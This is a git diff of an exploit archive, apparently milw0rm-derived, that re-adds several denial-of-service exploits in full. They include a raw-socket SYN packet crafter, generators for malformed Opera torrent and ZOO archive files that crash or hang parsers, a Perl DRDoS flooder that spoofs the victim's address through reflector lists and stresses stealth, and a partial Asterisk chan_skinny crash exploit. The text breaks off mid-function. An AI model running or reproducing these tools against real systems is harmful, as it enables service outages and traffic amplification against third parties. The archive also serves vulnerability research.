(dest,sizeof(dest)-1,"%d.%d.%d.%d\n", (unsigned char)he->h_addr_list[0][0], + (unsigned char)he->h_addr_list[0][1], + (unsigned char)he->h_addr_list[0][2], + (unsigned char)he->h_addr_list[0][3]); + + if ((sockfd = socket(AF_INET,SOCK_RAW,IPPROTO_TCP)) == -1) { + perror("socket"); + exit(1); + } + setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&opt,sizeof(opt)); + + etter.s_addr = inet_addr(dest); + s.sin_addr.s_addr = INADDR_ANY; + //etter.s_addr = inet_addr("69.46.19.77"); + memset(tcpoptions,0,sizeof(tcpoptions)); + tcpoptions[0]=0x08; + 
tcpoptions[1]=0x00; + tcpoptions[2]=0x00; + tcpoptions[3]=0x00; + + memset(&host, 0, sizeof(host)); + memset(pkt, 0, pLen); + memcpy(pkt+sizeof(IP)+sizeof(TCP), tcpoptions, sizeof(tcpoptions)); + memset(ip, 0, sIPLen); + *((unsigned long *)((unsigned char *)ip+0)) = s.sin_addr.s_addr; + *((unsigned long *)((unsigned char *)ip+4)) = etter.s_addr; + *((unsigned char *)((unsigned char *)ip+8)) = 0; + *((unsigned char *)((unsigned char *)ip+9)) = IPPROTO_TCP; + *((unsigned short *)((unsigned char *)ip+10)) = htons(pLen - sizeof(IP)); + iphdr->version = 4; + iphdr->ihl = 5; + iphdr->id = rand() & 0xFFFF; + iphdr->id = iphdr->id + 1; + iphdr->saddr = s.sin_addr.s_addr; + iphdr->daddr = etter.s_addr; + iphdr->protocol = IPPROTO_TCP; + iphdr->ttl = 255; + iphdr->tot_len = pLen; + iphdr->check = ipChecksum((u_short *)iphdr, sizeof(IP)); + + host.sin_family = AF_INET; + host.sin_addr.s_addr = etter.s_addr; + + tcphdr->source = htons(8); + tcphdr->dest = htons(1); + tcphdr->seq = htonl(rand()); + tcphdr->ack_seq = htonl(rand()); + tcphdr->doff = ((sizeof(TCP)+4) / 4); + tcphdr->check=0; + tcphdr->fin = 0; + tcphdr->syn = 1; + tcphdr->rst = 0; + tcphdr->psh = 0; + tcphdr->ack = 0; + tcphdr->urg = 0; + tcphdr->window = htons(5840); + memcpy(ip+12, ((unsigned char *)pkt)+sizeof(IP), pLen - sizeof(IP)); + tcphdr->check = ipChecksum((u_short *)&ip, sIPLen); + + sendto(sockfd, pkt, pLen, 0, (struct sockaddr *)&host, sizeof(host)); + + return 0; +} + +// milw0rm.com [2007-04-13] diff --git a/platforms/multiple/dos/3784.c b/platforms/multiple/dos/3784.c index f71907983..7a2990b0f 100755 --- a/platforms/multiple/dos/3784.c +++ b/platforms/multiple/dos/3784.c 
@@ -1,113 +1,113 @@ -/************************************************************************ - - -* Created Date :April 23 2007 -* -* Credits go to n00b for finding this vulnerability and writing p0c. -* Moderator of http://igniteds.net -* -* 0pera 9.2 torrent file remote dos exploit. -* -* opera has its own bit torrent client with-in the web browser -* it is possible to crash opera with a malformed torrent file -* causing denial of service to legitimate users..Opera will -* use 100% cpu till the inevitable happens..Which will be a crash -* To fix this problem disable the bitorrent with in opera.. -* -* Tested : win xp service pack 1 and 2 -* -* I wasn't able to catch any debugging info I'm afraid maybe some one -* else can give it a go. -* -* All i was able to get from drwatson pmsl was. -************************************************************************ - -* Application exception occurred: -* App: C:\Program Files\Opera\Opera.exe (pid=1084) -* When: 4/22/2007 @ 14:55:29.296 -* Exception number: 80000003 (hard coded breakpoint) -************************************************************************ - -* Seams like some sort of memory leak with the bitorrent client -* of opera.. 
-************************************************************************ - -******************************** -**/ - - -#include -#include -#include - -void usage(char* file); - -char header[] = "\x64\x38"; - -char My_buff[] = -"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"; - -char trailing_buff[] = -"\x36\x31\x3a\x09\x44\x69\x65\x20\x6f\x70\x65\x72\x61" - "\x20\x79\x6f\x75\x20\x73\x6c\x75\x74"; - -int main(int argc,char* argv[]) -{ - system("cls"); - - printf("\n *************************************************"); - printf("\n * Opera torrent file dos exploit by n00b *"); - printf("\n *************************************************"); - printf("\n * Shouts to every one at milw0rm *"); - printf("\n *************************************************"); - printf("\n * Special thanks to str0ke *"); - printf("\n * *"); - printf("\n * Date :Aprill 23 2007 *"); - printf("\n *************************************************"); - printf("\n * CREDITS TO n00b FOR FINDING THIS BUG *"); - printf("\n *************************************************"); - - if ( argc!=2 ) - { - usage(argv[0]); - } - - FILE *f; - f = fopen(argv[1],"w"); - if ( !f ) - { - printf("\nFuck some thing went wrong :D"); - exit(1); - } - - printf("\n\nMaking torrent file..."); - - fwrite(header,1,sizeof(header),f); - - fwrite(My_buff,1,sizeof(My_buff),f); - - 
fwrite(trailing_buff,1,sizeof(trailing_buff),f); - - printf("\nDone hoooooha!"); - printf("\n "); - printf("\n0h noes memory leak pmsl !!"); - return 0; -} - -void usage(char* file) -{ - - printf("\n\nusage: n00b.exe opera.torrent"); - exit(1); -} - -// milw0rm.com [2007-04-23] +/************************************************************************ + + +* Created Date :April 23 2007 +* +* Credits go to n00b for finding this vulnerability and writing p0c. +* Moderator of http://igniteds.net +* +* 0pera 9.2 torrent file remote dos exploit. +* +* opera has its own bit torrent client with-in the web browser +* it is possible to crash opera with a malformed torrent file +* causing denial of service to legitimate users..Opera will +* use 100% cpu till the inevitable happens..Which will be a crash +* To fix this problem disable the bitorrent with in opera.. +* +* Tested : win xp service pack 1 and 2 +* +* I wasn't able to catch any debugging info I'm afraid maybe some one +* else can give it a go. +* +* All i was able to get from drwatson pmsl was. +************************************************************************ + +* Application exception occurred: +* App: C:\Program Files\Opera\Opera.exe (pid=1084) +* When: 4/22/2007 @ 14:55:29.296 +* Exception number: 80000003 (hard coded breakpoint) +************************************************************************ + +* Seams like some sort of memory leak with the bitorrent client +* of opera.. 
+************************************************************************ + +******************************** +**/ + + +#include +#include +#include + +void usage(char* file); + +char header[] = "\x64\x38"; + +char My_buff[] = +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"; + +char trailing_buff[] = +"\x36\x31\x3a\x09\x44\x69\x65\x20\x6f\x70\x65\x72\x61" + "\x20\x79\x6f\x75\x20\x73\x6c\x75\x74"; + +int main(int argc,char* argv[]) +{ + system("cls"); + + printf("\n *************************************************"); + printf("\n * Opera torrent file dos exploit by n00b *"); + printf("\n *************************************************"); + printf("\n * Shouts to every one at milw0rm *"); + printf("\n *************************************************"); + printf("\n * Special thanks to str0ke *"); + printf("\n * *"); + printf("\n * Date :Aprill 23 2007 *"); + printf("\n *************************************************"); + printf("\n * CREDITS TO n00b FOR FINDING THIS BUG *"); + printf("\n *************************************************"); + + if ( argc!=2 ) + { + usage(argv[0]); + } + + FILE *f; + f = fopen(argv[1],"w"); + if ( !f ) + { + printf("\nFuck some thing went wrong :D"); + exit(1); + } + + printf("\n\nMaking torrent file..."); + + fwrite(header,1,sizeof(header),f); + + fwrite(My_buff,1,sizeof(My_buff),f); + + 
fwrite(trailing_buff,1,sizeof(trailing_buff),f); + + printf("\nDone hoooooha!"); + printf("\n "); + printf("\n0h noes memory leak pmsl !!"); + return 0; +} + +void usage(char* file) +{ + + printf("\n\nusage: n00b.exe opera.torrent"); + exit(1); +} + +// milw0rm.com [2007-04-23] diff --git a/platforms/multiple/dos/3851.c b/platforms/multiple/dos/3851.c index 4e0644e39..c7645c02b 100755 --- a/platforms/multiple/dos/3851.c +++ b/platforms/multiple/dos/3851.c 
@@ -1,165 +1,165 @@ -/* - -Exploit for the vulnerability: -Multiple vendors ZOO file decompression infinite loop DoS - -coded by Jean-Sébastien Guay-Leroux -September 2006 - -*/ - -#include -#include -#include - -// Structure of a ZOO header - -#define ZOO_HEADER_SIZE 0x0000002a - -#define ZH_TEXT 0 -#define ZH_TAG 20 -#define ZH_START_OFFSET 24 -#define ZH_NEG_START_OFFSET 28 -#define ZH_MAJ_VER 32 -#define ZH_MIN_VER 33 -#define ZH_ARC_HTYPE 34 -#define ZH_ARC_COMMENT 35 -#define ZH_ARC_COMMENT_LENGTH 39 -#define ZH_VERSION_DATA 41 - - -#define D_DIRENTRY_LENGTH 56 - -#define D_TAG 0 -#define D_TYPE 4 -#define D_PACKING_METHOD 5 -#define D_NEXT_ENTRY 6 -#define D_OFFSET 10 -#define D_DATE 14 -#define D_TIME 16 -#define D_FILE_CRC 18 -#define D_ORIGINAL_SIZE 20 -#define D_SIZE_NOW 24 -#define D_MAJ_VER 28 -#define D_MIN_VER 29 -#define D_DELETED 30 -#define D_FILE_STRUCT 31 -#define D_COMMENT_OFFSET 32 -#define D_COMMENT_SIZE 36 -#define D_FILENAME 38 -#define D_VAR_DIR_LEN 51 -#define D_TIMEZONE 53 -#define D_DIR_CRC 54 -#define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 ) -#define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 ) -#define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 ) - - -void put_byte (char *ptr, unsigned char data) { - *ptr = data; -} - -void put_word (char *ptr, unsigned short data) { - put_byte (ptr, data); - put_byte (ptr + 1, data >> 8); -} - -void put_longword (char *ptr, unsigned long data) { - put_byte (ptr, data); - put_byte (ptr + 1, data >> 8); - put_byte (ptr + 2, data >> 16); - put_byte (ptr + 3, data >> 24); -} - -FILE * open_file (char *filename) { - - FILE *fp; - - fp = fopen ( filename , "w" ); - - if (!fp) { - perror ("Cant open file"); - exit (1); - } - - return fp; -} - -void usage (char *progname) { - - printf ("\nTo use:\n"); - printf ("%s \n\n", progname); - - exit (1); -} - -int main (int argc, char *argv[]) { - FILE *fp; - char *hdr = (char *) malloc (4096); - char *filename = (char *) malloc (256); - int written_bytes; - int total_size; - - if ( argc 
!= 2) { - usage ( argv[0] ); - } - - strncpy (filename, argv[1], 255); - - if (!hdr || !filename) { - perror ("Error allocating memory"); - exit (1); - } - - memset (hdr, 0x00, 4096); - - // Build a ZOO header - memcpy (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18); - put_longword (hdr + ZH_TAG, 0xfdc4a7dc); - put_longword (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE); - put_longword (hdr + ZH_NEG_START_OFFSET, - (ZOO_HEADER_SIZE) * -1); - put_byte (hdr + ZH_MAJ_VER, 2); - put_byte (hdr + ZH_MIN_VER, 0); - put_byte (hdr + ZH_ARC_HTYPE, 1); - put_longword (hdr + ZH_ARC_COMMENT, 0); - put_word (hdr + ZH_ARC_COMMENT_LENGTH, 0); - put_byte (hdr + ZH_VERSION_DATA, 3); - - // Build vulnerable direntry struct - put_longword (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc); - put_byte (hdr + ZOO_HEADER_SIZE + D_TYPE, 1); - put_byte (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0); - put_longword (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a); - put_longword (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71); - put_word (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394); - put_word (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650); - put_word (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0); - put_longword (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0); - put_longword (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0); - put_byte (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1); - put_byte (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0); - put_byte (hdr + ZOO_HEADER_SIZE + D_DELETED, 0); - put_byte (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0); - put_longword (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0); - put_word (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0); - memcpy (hdr + ZOO_HEADER_SIZE + D_FILENAME, - "AAAAAAAA.AAA", 13); - - total_size = ZOO_HEADER_SIZE + 51; - - fp = open_file (filename); - - if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) { - printf ("The file has been written\n"); - } else { - printf ("Cant write to the file\n"); - exit (1); - } - - fclose (fp); - - return 0; -} - -// milw0rm.com [2007-05-04] +/* + +Exploit for the 
vulnerability: +Multiple vendors ZOO file decompression infinite loop DoS + +coded by Jean-Sébastien Guay-Leroux +September 2006 + +*/ + +#include +#include +#include + +// Structure of a ZOO header + +#define ZOO_HEADER_SIZE 0x0000002a + +#define ZH_TEXT 0 +#define ZH_TAG 20 +#define ZH_START_OFFSET 24 +#define ZH_NEG_START_OFFSET 28 +#define ZH_MAJ_VER 32 +#define ZH_MIN_VER 33 +#define ZH_ARC_HTYPE 34 +#define ZH_ARC_COMMENT 35 +#define ZH_ARC_COMMENT_LENGTH 39 +#define ZH_VERSION_DATA 41 + + +#define D_DIRENTRY_LENGTH 56 + +#define D_TAG 0 +#define D_TYPE 4 +#define D_PACKING_METHOD 5 +#define D_NEXT_ENTRY 6 +#define D_OFFSET 10 +#define D_DATE 14 +#define D_TIME 16 +#define D_FILE_CRC 18 +#define D_ORIGINAL_SIZE 20 +#define D_SIZE_NOW 24 +#define D_MAJ_VER 28 +#define D_MIN_VER 29 +#define D_DELETED 30 +#define D_FILE_STRUCT 31 +#define D_COMMENT_OFFSET 32 +#define D_COMMENT_SIZE 36 +#define D_FILENAME 38 +#define D_VAR_DIR_LEN 51 +#define D_TIMEZONE 53 +#define D_DIR_CRC 54 +#define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 ) +#define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 ) +#define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 ) + + +void put_byte (char *ptr, unsigned char data) { + *ptr = data; +} + +void put_word (char *ptr, unsigned short data) { + put_byte (ptr, data); + put_byte (ptr + 1, data >> 8); +} + +void put_longword (char *ptr, unsigned long data) { + put_byte (ptr, data); + put_byte (ptr + 1, data >> 8); + put_byte (ptr + 2, data >> 16); + put_byte (ptr + 3, data >> 24); +} + +FILE * open_file (char *filename) { + + FILE *fp; + + fp = fopen ( filename , "w" ); + + if (!fp) { + perror ("Cant open file"); + exit (1); + } + + return fp; +} + +void usage (char *progname) { + + printf ("\nTo use:\n"); + printf ("%s \n\n", progname); + + exit (1); +} + +int main (int argc, char *argv[]) { + FILE *fp; + char *hdr = (char *) malloc (4096); + char *filename = (char *) malloc (256); + int written_bytes; + int total_size; + + if ( argc != 2) { + usage ( argv[0] ); + } + + 
strncpy (filename, argv[1], 255); + + if (!hdr || !filename) { + perror ("Error allocating memory"); + exit (1); + } + + memset (hdr, 0x00, 4096); + + // Build a ZOO header + memcpy (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18); + put_longword (hdr + ZH_TAG, 0xfdc4a7dc); + put_longword (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE); + put_longword (hdr + ZH_NEG_START_OFFSET, + (ZOO_HEADER_SIZE) * -1); + put_byte (hdr + ZH_MAJ_VER, 2); + put_byte (hdr + ZH_MIN_VER, 0); + put_byte (hdr + ZH_ARC_HTYPE, 1); + put_longword (hdr + ZH_ARC_COMMENT, 0); + put_word (hdr + ZH_ARC_COMMENT_LENGTH, 0); + put_byte (hdr + ZH_VERSION_DATA, 3); + + // Build vulnerable direntry struct + put_longword (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc); + put_byte (hdr + ZOO_HEADER_SIZE + D_TYPE, 1); + put_byte (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0); + put_longword (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a); + put_longword (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71); + put_word (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394); + put_word (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650); + put_word (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0); + put_longword (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0); + put_longword (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0); + put_byte (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1); + put_byte (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0); + put_byte (hdr + ZOO_HEADER_SIZE + D_DELETED, 0); + put_byte (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0); + put_longword (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0); + put_word (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0); + memcpy (hdr + ZOO_HEADER_SIZE + D_FILENAME, + "AAAAAAAA.AAA", 13); + + total_size = ZOO_HEADER_SIZE + 51; + + fp = open_file (filename); + + if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) { + printf ("The file has been written\n"); + } else { + printf ("Cant write to the file\n"); + exit (1); + } + + fclose (fp); + + return 0; +} + +// milw0rm.com [2007-05-04] 
diff --git a/platforms/multiple/dos/3871.html b/platforms/multiple/dos/3871.html index 98ce8046e..598fe7956 100755 --- a/platforms/multiple/dos/3871.html +++ b/platforms/multiple/dos/3871.html @@ -1,51 +1,51 @@ - - - - - - - -# milw0rm.com [2007-05-08] + + + + + + + +# milw0rm.com [2007-05-08] diff --git a/platforms/multiple/dos/4038.pl b/platforms/multiple/dos/4038.pl index 884e98397..3faf8163a 100755 --- a/platforms/multiple/dos/4038.pl +++ b/platforms/multiple/dos/4038.pl 
@@ -1,139 +1,139 @@ -#!/usr/bin/perl - -# -# ~written by whoppix (c) 2007~ -# This Piece of software may be freely (re-)distributed under the Terms of the LGPL. -# for a short usage type ./script --help -# this program requires: perl, Net::RawIP (depends on libpcap), Getopt::Long -# (which should be shipped along with your perl core distribution) -# if you want to gain a deeper understanding about how DRDoS works, have a look at: -# http://www.grc.com/dos/drdos.htm -# This program is written for testing and researching purposes only. -# - -use warnings; -use strict; -use Net::RawIP; -use Getopt::Long; - -my $verbose = '0'; -my $syn_count = '1'; -my $victim = '127.0.0.1'; -my @lists = (); -my $net = new Net::RawIP; - -GetOptions( - 'verbose+' => \$verbose, - 'syn_count=s' => \$syn_count, - 'list=s' => \@lists, - 'help' => \&usage, -); -$victim = shift @ARGV; -if ( !$victim ) { - die "Error: No target specified, use --help\n"; -} -if ( !@lists ) { - die "Error: You have to specify at least one reflector list, use --help\n"; -} -foreach my $file (@lists) { - if ( !-e $file ) { - die "File does not seem to exist: $file\n"; - } -} -print "Starting attack on target $victim.\n"; -print "press Ctrl-C to interrupt at any time.\n" if $verbose >= 1; -while (1) { - foreach my $listfile (@lists) { - print "Loading reflector file: $listfile\n" if $verbose >= 1; - open( my $list, "<", $listfile ) - or die "Error opening file for reading: $listfile\n"; - while (<$list>) { - chomp; - if ( check_format($_) ) { - my $counter = $syn_count; - my $reflector = $_; - my ( $ip, $port ) = split( ':', $reflector ); - print "reflector ip: $ip, reflector port: $port\n" - if $verbose > 1; - for ( my $counter = $syn_count; $counter > 0; $counter-- ) { - print "attacking using reflector: $reflector\n" - if $verbose > 1; - my $rand = int( rand(65535) ); - while ( $rand == 0 ) { - print - "random number calculated for SRCPORT was zero, retrying...\n" - if $verbose > 1; - $rand = int( rand(65535) ); 
- } - print "random port used for SRCPORT: $rand\n" - if $verbose > 1; - $net->set( - { ip => { - saddr => $victim, - daddr => $ip, - }, - tcp => { - source => $rand, - dest => $port, - syn => 1, - }, - } - ); - $net->send(); - } - } - else { - print - "mirror \"$_\" not in correct format (ip:port) omitting...\n" - if $verbose >= 1; - } - } - } -} - -sub usage { - print "\nusage:\n\n"; - print "--help\t\t: youre reading it\n"; - print - "--verbose\t: makes the script more verbose. can be used several times to increase verbosity.\n"; - print "--list\t\t: used to specify a reflectorlist.\n"; - print - "\t\texample: ./script --list list1.txt --list list2.txt --list list3.txt 127.0.0.1\n"; - print - "\t\tthe more (and longer) lists you have, the better will the result be, and the more stealth you will gain.\n"; - print - "--syn_count\t: used to set the syn_count to a special value. default is 1.\n"; - print "\t\tdon't use too much - that would decrease your stealth. Default (and that should be fine) is 1.\n"; - print "\nGeneral information:\n"; - print "The usage of multiple lists can increase your stealth.\n"; - print "The more Mirrors or \"reflectors\" you use, the better will the result be.\n"; - print "The better the bandwidth of your mirrors is, the better will the result be.\n"; - print "Generally spoken is the bandwidth you use to flood your victim amplified by the factor 3-4.\n\n"; - die "\n"; -} - -sub check_format { # a function to check the ip:port format. 
- no warnings; - my $address = shift; - my ( $ip, $port ) = split( ':', $address ); - my @octets = split( '\.', $ip ); - - if ( $port < 1 or $port > 65535 ) { - print "port $port too high or low\n" if $verbose >= 1; - return; - } - if ( @octets != 4 ) { - print "ip has invalid number of octetts: $ip\n" if $verbose >= 1; - return; - } - foreach my $octet (@octets) { - if ( $octet < 0 or $octet > 255 ) { - print "octet is invalid: $octet\n" if $verbose >= 1; - return; - } - } - print "VALID!\n" if $verbose > 1; - return 1; -} - -# milw0rm.com [2007-06-06] +#!/usr/bin/perl + +# +# ~written by whoppix (c) 2007~ +# This Piece of software may be freely (re-)distributed under the Terms of the LGPL. +# for a short usage type ./script --help +# this program requires: perl, Net::RawIP (depends on libpcap), Getopt::Long +# (which should be shipped along with your perl core distribution) +# if you want to gain a deeper understanding about how DRDoS works, have a look at: +# http://www.grc.com/dos/drdos.htm +# This program is written for testing and researching purposes only. 
+# + +use warnings; +use strict; +use Net::RawIP; +use Getopt::Long; + +my $verbose = '0'; +my $syn_count = '1'; +my $victim = '127.0.0.1'; +my @lists = (); +my $net = new Net::RawIP; + +GetOptions( + 'verbose+' => \$verbose, + 'syn_count=s' => \$syn_count, + 'list=s' => \@lists, + 'help' => \&usage, +); +$victim = shift @ARGV; +if ( !$victim ) { + die "Error: No target specified, use --help\n"; +} +if ( !@lists ) { + die "Error: You have to specify at least one reflector list, use --help\n"; +} +foreach my $file (@lists) { + if ( !-e $file ) { + die "File does not seem to exist: $file\n"; + } +} +print "Starting attack on target $victim.\n"; +print "press Ctrl-C to interrupt at any time.\n" if $verbose >= 1; +while (1) { + foreach my $listfile (@lists) { + print "Loading reflector file: $listfile\n" if $verbose >= 1; + open( my $list, "<", $listfile ) + or die "Error opening file for reading: $listfile\n"; + while (<$list>) { + chomp; + if ( check_format($_) ) { + my $counter = $syn_count; + my $reflector = $_; + my ( $ip, $port ) = split( ':', $reflector ); + print "reflector ip: $ip, reflector port: $port\n" + if $verbose > 1; + for ( my $counter = $syn_count; $counter > 0; $counter-- ) { + print "attacking using reflector: $reflector\n" + if $verbose > 1; + my $rand = int( rand(65535) ); + while ( $rand == 0 ) { + print + "random number calculated for SRCPORT was zero, retrying...\n" + if $verbose > 1; + $rand = int( rand(65535) ); + } + print "random port used for SRCPORT: $rand\n" + if $verbose > 1; + $net->set( + { ip => { + saddr => $victim, + daddr => $ip, + }, + tcp => { + source => $rand, + dest => $port, + syn => 1, + }, + } + ); + $net->send(); + } + } + else { + print + "mirror \"$_\" not in correct format (ip:port) omitting...\n" + if $verbose >= 1; + } + } + } +} + +sub usage { + print "\nusage:\n\n"; + print "--help\t\t: youre reading it\n"; + print + "--verbose\t: makes the script more verbose. 
can be used several times to increase verbosity.\n"; + print "--list\t\t: used to specify a reflectorlist.\n"; + print + "\t\texample: ./script --list list1.txt --list list2.txt --list list3.txt 127.0.0.1\n"; + print + "\t\tthe more (and longer) lists you have, the better will the result be, and the more stealth you will gain.\n"; + print + "--syn_count\t: used to set the syn_count to a special value. default is 1.\n"; + print "\t\tdon't use too much - that would decrease your stealth. Default (and that should be fine) is 1.\n"; + print "\nGeneral information:\n"; + print "The usage of multiple lists can increase your stealth.\n"; + print "The more Mirrors or \"reflectors\" you use, the better will the result be.\n"; + print "The better the bandwidth of your mirrors is, the better will the result be.\n"; + print "Generally spoken is the bandwidth you use to flood your victim amplified by the factor 3-4.\n\n"; + die "\n"; +} + +sub check_format { # a function to check the ip:port format. + no warnings; + my $address = shift; + my ( $ip, $port ) = split( ':', $address ); + my @octets = split( '\.', $ip ); + + if ( $port < 1 or $port > 65535 ) { + print "port $port too high or low\n" if $verbose >= 1; + return; + } + if ( @octets != 4 ) { + print "ip has invalid number of octetts: $ip\n" if $verbose >= 1; + return; + } + foreach my $octet (@octets) { + if ( $octet < 0 or $octet > 255 ) { + print "octet is invalid: $octet\n" if $verbose >= 1; + return; + } + } + print "VALID!\n" if $verbose > 1; + return 1; +} + +# milw0rm.com [2007-06-06] diff --git a/platforms/multiple/dos/4175.php b/platforms/multiple/dos/4175.php index e34918da6..c28e1fd05 100755 --- a/platforms/multiple/dos/4175.php +++ b/platforms/multiple/dos/4175.php @@ -1,23 +1,23 @@ - - -# milw0rm.com [2007-07-12] + + +# milw0rm.com [2007-07-12] diff --git a/platforms/multiple/dos/4181.php b/platforms/multiple/dos/4181.php index 282d94061..4113ed67b 100755 --- a/platforms/multiple/dos/4181.php 
+++ b/platforms/multiple/dos/4181.php @@ -1,36 +1,36 @@ - - -# milw0rm.com [2007-07-14] + + +# milw0rm.com [2007-07-14] diff --git a/platforms/multiple/dos/4196.c b/platforms/multiple/dos/4196.c index 8ce4abde2..99ab6ec6f 100755 --- a/platforms/multiple/dos/4196.c +++ b/platforms/multiple/dos/4196.c 
@@ -1,181 +1,181 @@ -/* - * AstKilla2.c - * gcc -o astkilla2 astkilla2.c - * ./astkilla2 -h 216.246.**.*** - * In no event will the author of this source be liable for any loss or damage of a material or - * immaterial nature arising from access to, use or non-use of published information, or from misuse of the connection or technical faults. - - - chan_skinny runs on 2000/TCP if you find a host with this open there is a really decent chance it's a asterisk machine some admin - forgot to disable chan_skinny on (which is default).. this should be a to all of those who don't lock down what they dont need (what is this 1999 ?) - - this is really quite old but as it turns out someone made the bug public, how sad.. but eh there are more fish in sea ;) - well here is a exploit for everyone who didn't take a look at the code. - - - -- = fbff = -- - -*/ -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define SKINNY_TCP_PORT 2000 -#define CLEN 1024 -#define SKINNY_MAX_SIZE 1000 -#define REGISTER_MESSAGE 0x0001 -struct register_message { - char name[16]; - uint32_t userId; - uint32_t instance; - uint32_t ip; - uint32_t type; - uint32_t maxStreams; -}; -struct skinny_client { - int sd; - struct sockaddr_in saddr; - int active; - char rhost[CLEN]; - char username[CLEN]; - char password[CLEN]; - char packet[SKINNY_MAX_SIZE]; -}; -struct skinny_client_message { - int len; - int res; - int e; /* 12 bytes */ - char *data; -}; - -struct skinny_client *g_sc; -struct messages { - int e; - char *human; - int (* const message_handler)(struct skinny_client *sc, struct skinny_client_message *scm); -} message_list[] = { - {0x81,"Register Ack Message\n", NULL}, - {0x9b,"Capabilities Request Message\n",NULL}, - {0x9f,"Reset Message\n", NULL} -}; -int skinny_client_read(struct skinny_client *sc) -{ - int ret; - int elm; - int type; - int i; - char buf[SKINNY_MAX_SIZE]; - struct skinny_client_message scm; - memset(&scm,0x00,sizeof(struct 
skinny_client_message)); - memset(&buf,0x00,sizeof(buf)); - elm = (sizeof(message_list)/sizeof(struct messages)); - ret = read(sc->sd,&buf,sizeof(buf)); - if (ret == -1) { - printf("+++ GOOD NEWS THE REMOTE HOST IS DEAD! READ RETURNED -1 AND THE TCP CONNECTION HAS WENT BYEBYE\n"); - return -1; - } else if (ret < sizeof(struct skinny_client_message) - 4){ - printf("we got some data back from the server just to little of it!\n"); - } else { - printf("++++ THINGS BROKE BUT THE HOST MAY STILL BE UP. HOW SAD\n"); - } - - return 0; -} -int skinny_client_sendmessage(struct skinny_client *sc, struct skinny_client_message *scm) -{ - int res; - int len; - char *outbuf; - int test; - - len = 90; - scm->len = 3; - outbuf = malloc(len); - if (!outbuf) { - return -1; - } - memset(outbuf,0x41,len); - /* place the 12 bytes header into outbuf */ - memcpy(outbuf,scm,12); - /* place the data into outbuf */ - memcpy(outbuf+12,scm->data,len-12); - res = write(sc->sd,outbuf,len); - printf("++ Wrote %i bytes\n", res); - return 0; -} - -/* send out a client register message to the remote skinny node */ -int skinny_client_register(struct skinny_client 